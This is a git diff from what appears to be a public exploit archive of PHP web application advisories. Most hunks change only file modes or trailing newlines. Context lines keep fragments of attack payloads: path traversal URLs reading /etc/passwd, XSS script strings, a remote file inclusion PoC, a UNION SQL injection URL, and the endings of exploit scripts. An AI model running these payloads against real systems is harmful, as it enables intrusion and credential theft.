b/platforms/php/webapps/20166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20170.txt b/platforms/php/webapps/20170.txt old mode 100755 new mode 100644 index 5d31d832d..fed9efa91 --- a/platforms/php/webapps/20170.txt +++ b/platforms/php/webapps/20170.txt @@ -35,4 +35,4 @@ ________________________________________________________________________________ Im not responsible for which is given No me hago responsable del uso que se le de _______________________________________________________________________________________ -Daniel Barragan "D4NB4R" 2012 \ No newline at end of file +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/platforms/php/webapps/20171.txt b/platforms/php/webapps/20171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20172.txt b/platforms/php/webapps/20172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2018.txt b/platforms/php/webapps/2018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2019.txt b/platforms/php/webapps/2019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20197.txt b/platforms/php/webapps/20197.txt old mode 100755 new mode 100644 index a156742e3..54d874338 --- a/platforms/php/webapps/20197.txt +++ b/platforms/php/webapps/20197.txt @@ -72,4 +72,4 @@ Joomgalaxy is a rich, comprehensive directory component brimming with unique fea Im not responsible for which is given No me hago responsable del uso que se le de _______________________________________________________________________________________ -Daniel Barragan "D4NB4R" 2012 \ No newline at end of file +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/platforms/php/webapps/20198.txt b/platforms/php/webapps/20198.txt old mode 100755 new mode 100644 index 0dccdcaf0..fabaaa61b --- a/platforms/php/webapps/20198.txt +++ b/platforms/php/webapps/20198.txt @@ -40,4 +40,4 @@ Example http://localhost/exp/am4ss/misc.php?do=deletemail&mail="><script>alert(' ================================================= -Gr34ts 4 : Sec-w.com Members \ No newline at end of file +Gr34ts 4 : Sec-w.com Members \ No newline at end of file diff --git a/platforms/php/webapps/20199.php b/platforms/php/webapps/20199.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2020.txt b/platforms/php/webapps/2020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20208.txt b/platforms/php/webapps/20208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2021.txt b/platforms/php/webapps/2021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2022.txt b/platforms/php/webapps/2022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2023.txt b/platforms/php/webapps/2023.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2024.txt b/platforms/php/webapps/2024.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2025.txt b/platforms/php/webapps/2025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2026.txt b/platforms/php/webapps/2026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20260.txt b/platforms/php/webapps/20260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20268.txt b/platforms/php/webapps/20268.txt old mode 100755 new mode 100644 index 3d3e1ce65..2be10f127 --- a/platforms/php/webapps/20268.txt +++ b/platforms/php/webapps/20268.txt @@ -74,4 +74,4 @@ they are able to select which table within the database they wish to view includ <input type="hidden" name="frm_responder_id" value="0"/> </form> </body> - </html> \ No newline at end of file + </html> \ No newline at end of file diff --git a/platforms/php/webapps/2027.txt b/platforms/php/webapps/2027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20270.txt b/platforms/php/webapps/20270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20278.txt b/platforms/php/webapps/20278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2028.txt b/platforms/php/webapps/2028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2029.txt b/platforms/php/webapps/2029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2030.txt b/platforms/php/webapps/2030.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2032.pl b/platforms/php/webapps/2032.pl index e3f573e97..4f16c753a 100755 --- a/platforms/php/webapps/2032.pl +++ b/platforms/php/webapps/2032.pl @@ -248,5 +248,4 @@ for ($k=0;$k<=$#ARR;$k++) #======================================================================================================== -# milw0rm.com [2006-07-18] - \ No newline at end of file +# milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/20342.php b/platforms/php/webapps/20342.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20344.php b/platforms/php/webapps/20344.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20345.txt b/platforms/php/webapps/20345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20346.txt b/platforms/php/webapps/20346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20347.txt b/platforms/php/webapps/20347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2035.php b/platforms/php/webapps/2035.php old mode 100755 new mode 100644 index e789e1344..a0dfe4327 --- a/platforms/php/webapps/2035.php +++ b/platforms/php/webapps/2035.php @@ -136,5 +136,4 @@ die($temp[1]);} echo "Exploit failed..."; ?> -# milw0rm.com [2006-07-18] - \ No newline at end of file +# milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/platforms/php/webapps/2036.txt b/platforms/php/webapps/2036.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20390.txt b/platforms/php/webapps/20390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20391.php b/platforms/php/webapps/20391.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20398.txt b/platforms/php/webapps/20398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20416.txt b/platforms/php/webapps/20416.txt old mode 100755 new mode 100644 index 37daa93df..1bb956b4a --- a/platforms/php/webapps/20416.txt +++ b/platforms/php/webapps/20416.txt @@ -38,6 +38,4 @@ Greetz: T0r3x, m1l05, JuMp-Er, EsC, UNICORN, Xermes, s4r4d0 ----------------------------snip-------------------------------------- Thanks, -~StRoNiX - - \ No newline at end of file +~StRoNiX \ No newline at end of file diff --git a/platforms/php/webapps/20419.txt b/platforms/php/webapps/20419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20421.txt b/platforms/php/webapps/20421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20422.txt b/platforms/php/webapps/20422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20428.txt b/platforms/php/webapps/20428.txt old mode 100755 new mode 100644 index 78a2ad625..e16df578f --- a/platforms/php/webapps/20428.txt +++ b/platforms/php/webapps/20428.txt @@ -10,4 +10,4 @@ include "$admindir/forums/$num.php"; where $f is read from user input via a form, and is meant to be the name of a selected forum. However, any value can be submitted as $f and the corresponding PHP file will be displayed to the browser. This could lead to disclosure of sensitive information, including the MySql server, database name, userid and password, which are kept in master.php. -http://target/cgi-bin/forums/list.php?f=DESIRED_PHP_FILE_WITHOUT_EXTENSION \ No newline at end of file +http://target/cgi-bin/forums/list.php?f=DESIRED_PHP_FILE_WITHOUT_EXTENSION \ No newline at end of file diff --git a/platforms/php/webapps/20431.txt b/platforms/php/webapps/20431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2046.txt b/platforms/php/webapps/2046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20474.txt b/platforms/php/webapps/20474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20476.txt b/platforms/php/webapps/20476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2049.txt b/platforms/php/webapps/2049.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2050.php b/platforms/php/webapps/2050.php old mode 100755 new mode 100644 index aadc387ca..5d2b69b83 --- a/platforms/php/webapps/2050.php +++ b/platforms/php/webapps/2050.php @@ -145,5 +145,4 @@ die; echo "exploit failed..."; ?> -# milw0rm.com [2006-07-21] - \ No newline at end of file +# milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/platforms/php/webapps/20538.txt b/platforms/php/webapps/20538.txt old mode 100755 new mode 100644 index 4beaa26e2..3db9038b9 --- a/platforms/php/webapps/20538.txt +++ b/platforms/php/webapps/20538.txt @@ -9,4 +9,4 @@ These files reside in directories accessible via http. If the webserver is not c Properly exploited, this information can allow further attacks on the affected host. http://target/class/mysql.class -http://target/inc/sendmail.inc (settings.inc and etc.) \ No newline at end of file +http://target/inc/sendmail.inc (settings.inc and etc.) \ No newline at end of file diff --git a/platforms/php/webapps/20539.txt b/platforms/php/webapps/20539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20541.txt b/platforms/php/webapps/20541.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20544.txt b/platforms/php/webapps/20544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20546.txt b/platforms/php/webapps/20546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20550.txt b/platforms/php/webapps/20550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20573.html b/platforms/php/webapps/20573.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20574.txt b/platforms/php/webapps/20574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20576.txt b/platforms/php/webapps/20576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2058.txt b/platforms/php/webapps/2058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20580.txt b/platforms/php/webapps/20580.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20586.txt b/platforms/php/webapps/20586.txt old mode 100755 new mode 100644 index 9e3e05e68..4c8aaa4e2 --- a/platforms/php/webapps/20586.txt +++ b/platforms/php/webapps/20586.txt @@ -12,4 +12,4 @@ Next, after gaining administrative access to the system, enter the "Master Setti ../../../../../../../../../../../etc/passwd -This will make the contents of the /etc/passwd file viewable. \ No newline at end of file +This will make the contents of the /etc/passwd file viewable. \ No newline at end of file diff --git a/platforms/php/webapps/20587.txt b/platforms/php/webapps/20587.txt old mode 100755 new mode 100644 index 818e8419e..f9cf120a0 --- a/platforms/php/webapps/20587.txt +++ b/platforms/php/webapps/20587.txt @@ -8,4 +8,4 @@ This vulnerability may be exploited requesting a URL of: http://some.host.com/violation.php3?Mod=address@to.spam&ForumName=text_to_spam -Where address@to.spam is the destination of the mail, and text_to_spam is the text to appear in the body of the mail. \ No newline at end of file +Where address@to.spam is the destination of the mail, and text_to_spam is the text to appear in the body of the mail. \ No newline at end of file diff --git a/platforms/php/webapps/20588.txt b/platforms/php/webapps/20588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20598.txt b/platforms/php/webapps/20598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2060.txt b/platforms/php/webapps/2060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2062.txt b/platforms/php/webapps/2062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2063.txt b/platforms/php/webapps/2063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2064.txt b/platforms/php/webapps/2064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2066.txt b/platforms/php/webapps/2066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20665.txt b/platforms/php/webapps/20665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20666.html b/platforms/php/webapps/20666.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20671.html b/platforms/php/webapps/20671.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20673.txt b/platforms/php/webapps/20673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2068.php b/platforms/php/webapps/2068.php old mode 100755 new mode 100644 index c92936570..8b0043b19 --- a/platforms/php/webapps/2068.php +++ b/platforms/php/webapps/2068.php @@ -216,5 +216,4 @@ else {die("Exploit failed..");} ?> -# milw0rm.com [2006-07-24] - \ No newline at end of file +# milw0rm.com [2006-07-24] \ No newline at end of file diff --git a/platforms/php/webapps/2069.txt b/platforms/php/webapps/2069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20703.txt b/platforms/php/webapps/20703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20704.txt b/platforms/php/webapps/20704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20708.txt b/platforms/php/webapps/20708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20709.html b/platforms/php/webapps/20709.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2071.php b/platforms/php/webapps/2071.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20710.html b/platforms/php/webapps/20710.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2072.php b/platforms/php/webapps/2072.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20729.txt b/platforms/php/webapps/20729.txt old mode 100755 new mode 100644 index b5677a345..983bd3a46 --- a/platforms/php/webapps/20729.txt +++ b/platforms/php/webapps/20729.txt @@ -20,4 +20,4 @@ we write http://www.example.com/banners.php?op=Change&bid=1&url=http://you.are.redir -(where www.example.com is the server running php-nuke) \ No newline at end of file +(where www.example.com is the server running php-nuke) \ No newline at end of file diff --git a/platforms/php/webapps/20759.txt b/platforms/php/webapps/20759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20760.txt b/platforms/php/webapps/20760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20761.txt b/platforms/php/webapps/20761.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20762.php b/platforms/php/webapps/20762.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2077.txt b/platforms/php/webapps/2077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2078.txt b/platforms/php/webapps/2078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20785.txt b/platforms/php/webapps/20785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20787.txt b/platforms/php/webapps/20787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20788.txt b/platforms/php/webapps/20788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20789.txt b/platforms/php/webapps/20789.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2081.txt b/platforms/php/webapps/2081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2083.txt b/platforms/php/webapps/2083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2084.txt b/platforms/php/webapps/2084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20848.txt b/platforms/php/webapps/20848.txt old mode 100755 new mode 100644 index 4ae2b68a1..f7d5f8ab8 --- a/platforms/php/webapps/20848.txt +++ b/platforms/php/webapps/20848.txt @@ -26,4 +26,4 @@ the block of the main page. It might become an issue if blockAdmin.php3 gives add/edit/remove permission to some users that are not -supposed to access the filesystem. \ No newline at end of file +supposed to access the filesystem. \ No newline at end of file diff --git a/platforms/php/webapps/2085.txt b/platforms/php/webapps/2085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20855.txt b/platforms/php/webapps/20855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20856.txt b/platforms/php/webapps/20856.txt old mode 100755 new mode 100644 index 5a1d568be..20c2cbe96 --- a/platforms/php/webapps/20856.txt +++ b/platforms/php/webapps/20856.txt @@ -58,4 +58,4 @@ Steps to reproduce the issue: 3.4. Click the "CREATE" button. 3.5. XSS Should be triggered in the "document index" view. -The XSS should also be triggerd on the main page. \ No newline at end of file +The XSS should also be triggerd on the main page. \ No newline at end of file diff --git a/platforms/php/webapps/20857.txt b/platforms/php/webapps/20857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20859.txt b/platforms/php/webapps/20859.txt old mode 100755 new mode 100644 index 3a8b46b1f..dd002691c --- a/platforms/php/webapps/20859.txt +++ b/platforms/php/webapps/20859.txt @@ -30,4 +30,4 @@ Exploit: http://no-exploit.com/forum/admin/admin_modif_partenaire.php?id=-1 unio [!x!] To: All friends Cyber_Devil Allah with you -members [No-exploit.Com] \ No newline at end of file +members [No-exploit.Com] \ No newline at end of file diff --git a/platforms/php/webapps/2086.txt b/platforms/php/webapps/2086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20862.txt b/platforms/php/webapps/20862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20863.txt b/platforms/php/webapps/20863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20866.txt b/platforms/php/webapps/20866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2087.php b/platforms/php/webapps/2087.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20871.txt b/platforms/php/webapps/20871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20872.txt b/platforms/php/webapps/20872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20873.html b/platforms/php/webapps/20873.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20874.html b/platforms/php/webapps/20874.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2088.php b/platforms/php/webapps/2088.php old mode 100755 new mode 100644 index 2caac73a0..09c48c570 --- a/platforms/php/webapps/2088.php +++ b/platforms/php/webapps/2088.php @@ -257,5 +257,4 @@ echo "password (clear text) -> ".$my_password."\n"; echo "----------------------------------------------------------\n"; ?> -# milw0rm.com [2006-07-30] - \ No newline at end of file +# milw0rm.com [2006-07-30] \ No newline at end of file diff --git a/platforms/php/webapps/2089.txt b/platforms/php/webapps/2089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2090.txt b/platforms/php/webapps/2090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20913.txt b/platforms/php/webapps/20913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20918.txt b/platforms/php/webapps/20918.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2092.txt b/platforms/php/webapps/2092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20942.html b/platforms/php/webapps/20942.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2095.txt b/platforms/php/webapps/2095.txt old mode 100755 new mode 100644 index d4bffe909..b825bb7ee --- a/platforms/php/webapps/2095.txt +++ b/platforms/php/webapps/2095.txt @@ -21,5 +21,4 @@ # ############################################################################## -# milw0rm.com [2006-07-31] - \ No newline at end of file +# milw0rm.com [2006-07-31] \ No newline at end of file diff --git a/platforms/php/webapps/20956.txt b/platforms/php/webapps/20956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2096.txt b/platforms/php/webapps/2096.txt old mode 100755 new mode 100644 index c53324361..149ed1c43 --- a/platforms/php/webapps/2096.txt +++ b/platforms/php/webapps/2096.txt @@ -52,5 +52,4 @@ EAR.php/&cmd=ls + +-------------------------[ E O F ]---------------------------------- -# milw0rm.com [2006-07-31] - \ No newline at end of file +# milw0rm.com [2006-07-31] \ No newline at end of file diff --git a/platforms/php/webapps/2097.txt b/platforms/php/webapps/2097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2098.txt b/platforms/php/webapps/2098.txt old mode 100755 new mode 100644 index 43a3c1969..23e2c929a --- a/platforms/php/webapps/2098.txt +++ b/platforms/php/webapps/2098.txt @@ -44,5 +44,4 @@ + +-------------------------[ E O F ]---------------------------------- -# milw0rm.com [2006-08-01] - \ No newline at end of file +# milw0rm.com [2006-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/20981.txt b/platforms/php/webapps/20981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20983.pl b/platforms/php/webapps/20983.pl index cec4a7ac3..77d8ae0b8 100755 --- a/platforms/php/webapps/20983.pl +++ b/platforms/php/webapps/20983.pl @@ -93,6 +93,4 @@ chomp(my $target=<STDIN>); _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - - \ No newline at end of file +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/platforms/php/webapps/2099.txt b/platforms/php/webapps/2099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/20995.txt b/platforms/php/webapps/20995.txt old mode 100755 new mode 100644 index d3c6db9ea..a46493112 --- a/platforms/php/webapps/20995.txt +++ b/platforms/php/webapps/20995.txt @@ -5,4 +5,4 @@ It includes pre-installed tools and applications and can be put online with very A vulnerability in Cobalt Qube's webmail implementation allows remote attackers to traverse directories. Malformed HTTP requests can be crafted to display sensitive information about the host. -http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 \ No newline at end of file +http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 \ No newline at end of file diff --git a/platforms/php/webapps/20996.txt b/platforms/php/webapps/20996.txt old mode 100755 new mode 100644 index 71892192e..b2e59b5f1 --- a/platforms/php/webapps/20996.txt +++ b/platforms/php/webapps/20996.txt @@ -6,4 +6,4 @@ During operation, Basilix opens a PHP include file using a variable as the filen This vulnerability may disclose sensitive information contained in arbitrary web-readable files. It may also be possible for remote attackers to execute php files. -http://beta.basilix.org/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah \ No newline at end of file +http://beta.basilix.org/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah \ No newline at end of file diff --git a/platforms/php/webapps/2100.txt b/platforms/php/webapps/2100.txt old mode 100755 new mode 100644 index b55d336d7..aad9764b1 --- a/platforms/php/webapps/2100.txt +++ b/platforms/php/webapps/2100.txt @@ -45,5 +45,4 @@ + +-------------------------[ E O F ]---------------------------------- -# milw0rm.com [2006-08-01] - \ No newline at end of file +# milw0rm.com [2006-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/21005.txt b/platforms/php/webapps/21005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21007.txt b/platforms/php/webapps/21007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2101.txt b/platforms/php/webapps/2101.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2102.txt b/platforms/php/webapps/2102.txt old mode 100755 new mode 100644 index 7b7ae3afb..ce772f34c --- a/platforms/php/webapps/2102.txt +++ b/platforms/php/webapps/2102.txt @@ -35,5 +35,4 @@ #Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer ================================================================= -# milw0rm.com [2006-08-01] - \ No newline at end of file +# milw0rm.com [2006-08-01] \ No newline at end of file diff --git a/platforms/php/webapps/21022.txt b/platforms/php/webapps/21022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2103.txt b/platforms/php/webapps/2103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21038.txt b/platforms/php/webapps/21038.txt old mode 100755 new mode 100644 index 10cabb5a7..95a9c3dc2 --- a/platforms/php/webapps/21038.txt +++ b/platforms/php/webapps/21038.txt @@ -6,4 +6,4 @@ If a malicious user may subtitute arbitrary values for image form elements in th http://www.target.com/../../../dir_on_server/anyfile.ext -It will load the file when the user info of the attacker is viewed. \ No newline at end of file +It will load the file when the user info of the attacker is viewed. \ No newline at end of file diff --git a/platforms/php/webapps/2104.txt b/platforms/php/webapps/2104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21046.txt b/platforms/php/webapps/21046.txt old mode 100755 new mode 100644 index 54336bca1..869b5bf4d --- a/platforms/php/webapps/21046.txt +++ b/platforms/php/webapps/21046.txt @@ -19,4 +19,4 @@ Summary: 2. Enter above URL with the correct sitename and replace l337h4x0r with your username. 3. Click on "Administration Panel" near the bottom of -the page. \ No newline at end of file +the page. \ No newline at end of file diff --git a/platforms/php/webapps/2105.php b/platforms/php/webapps/2105.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21054.txt b/platforms/php/webapps/21054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21056.txt b/platforms/php/webapps/21056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21084.txt b/platforms/php/webapps/21084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2109.txt b/platforms/php/webapps/2109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2110.pm b/platforms/php/webapps/2110.pm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21119.txt b/platforms/php/webapps/21119.txt old mode 100755 new mode 100644 index 46dd19e3c..05ca9cf42 --- a/platforms/php/webapps/21119.txt +++ b/platforms/php/webapps/21119.txt @@ -15,4 +15,4 @@ This encoded string would then be passsed to the article.php script by requestin http://targethost/article.php?save=1&sid=20&cookieusrtime=160000&user=USERID:encodedstring -Where encodedstring is the previously described base64 encoded string. Base64 encoding can be trivially accomplished with the use of any of a number of simple utilities. \ No newline at end of file +Where encodedstring is the previously described base64 encoded string. Base64 encoding can be trivially accomplished with the use of any of a number of simple utilities. \ No newline at end of file diff --git a/platforms/php/webapps/2113.txt b/platforms/php/webapps/2113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21132.txt b/platforms/php/webapps/21132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21133.txt b/platforms/php/webapps/21133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21135.txt b/platforms/php/webapps/21135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2114.htm b/platforms/php/webapps/2114.htm old mode 100755 new mode 100644 index 1f2f06dcb..64736dc00 --- a/platforms/php/webapps/2114.htm +++ b/platforms/php/webapps/2114.htm @@ -16,5 +16,4 @@ Existing User:<INPUT name=uname><br> document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php"; </script> -# milw0rm.com [2006-08-02] - \ No newline at end of file +# milw0rm.com [2006-08-02] \ No newline at end of file diff --git a/platforms/php/webapps/21148.txt b/platforms/php/webapps/21148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2115.txt b/platforms/php/webapps/2115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21157.txt b/platforms/php/webapps/21157.txt old mode 100755 new mode 100644 index 34505b729..9c057127b --- a/platforms/php/webapps/21157.txt +++ b/platforms/php/webapps/21157.txt @@ -6,4 +6,4 @@ Due to insufficient validation of user-supplied input, it is be possible to view This issue may allow a remote attacker to gather sensitive information which may be used in directed and organized attacks against a host running the Gallery software. -http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts \ No newline at end of file +http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts \ No newline at end of file diff --git a/platforms/php/webapps/2116.txt b/platforms/php/webapps/2116.txt old mode 100755 new mode 100644 index cad8d7d38..b9600d1a2 --- a/platforms/php/webapps/2116.txt +++ b/platforms/php/webapps/2116.txt @@ -22,5 +22,4 @@ Not-leet-enough: "Powered By TSEP" POC: http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=http://remotefile/? -# milw0rm.com [2006-08-02] - \ No newline at end of file +# milw0rm.com [2006-08-02] \ No newline at end of file diff --git a/platforms/php/webapps/21165.txt b/platforms/php/webapps/21165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21166.txt b/platforms/php/webapps/21166.txt old mode 100755 new mode 100644 index 61908c14b..b685c8a21 --- a/platforms/php/webapps/21166.txt +++ b/platforms/php/webapps/21166.txt @@ -14,4 +14,4 @@ An additional cross-site scripting vulnerability has been reported in modules.ph **It has been reported that the cross-site scripting issue affecting the 'ttitle' parameter of 'modules.php' script has been re-introduced in newer versions of the PHPNuke application. This issue is reported to affect versions 7.2 and prior. -http://phpnukesite/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=2&ttitle=%3Cscript%3Ealert(document.location)%3C/script%3E \ No newline at end of file +http://phpnukesite/modules.php?op=modload&name=Downloads&file=index&req=viewdownloaddetails&lid=2&ttitle=%3Cscript%3Ealert(document.location)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/21168.txt b/platforms/php/webapps/21168.txt old mode 100755 new mode 100644 index 652ec7097..d1be2f472 --- a/platforms/php/webapps/21168.txt +++ b/platforms/php/webapps/21168.txt @@ -10,4 +10,4 @@ Earlier versions may also be vulnerable. http://[target]/index.php?action=comments&do=save&id=1&cid=../news&name=11/1 1/11&kommentar=%20&email=hax0r&zeit=you%20suck,11:11,../news,bugs@securityal -ert.com&datum=easynews%20exploited \ No newline at end of file +ert.com&datum=easynews%20exploited \ No newline at end of file diff --git a/platforms/php/webapps/2117.php b/platforms/php/webapps/2117.php old mode 100755 new mode 100644 index 490551388..57c692d88 --- a/platforms/php/webapps/2117.php +++ b/platforms/php/webapps/2117.php @@ -305,5 +305,4 @@ elseif ($action==4) else echo ("specify an action [1-4]..."); ?> -# milw0rm.com [2006-08-03] - \ No newline at end of file +# milw0rm.com [2006-08-03] \ No newline at end of file diff --git a/platforms/php/webapps/2118.php b/platforms/php/webapps/2118.php old mode 100755 new mode 100644 index 486f21bb1..3a500db70 --- a/platforms/php/webapps/2118.php +++ b/platforms/php/webapps/2118.php @@ -259,5 +259,4 @@ if (is_hash($temp2[0])) echo "exploit failed..."; ?> -# milw0rm.com [2006-08-07] - \ No newline at end of file +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/platforms/php/webapps/2119.txt b/platforms/php/webapps/2119.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2120.txt b/platforms/php/webapps/2120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/21206.txt b/platforms/php/webapps/21206.txt old mode 100755 new mode 100644 index bd625b6bc..0219e59a2 --- 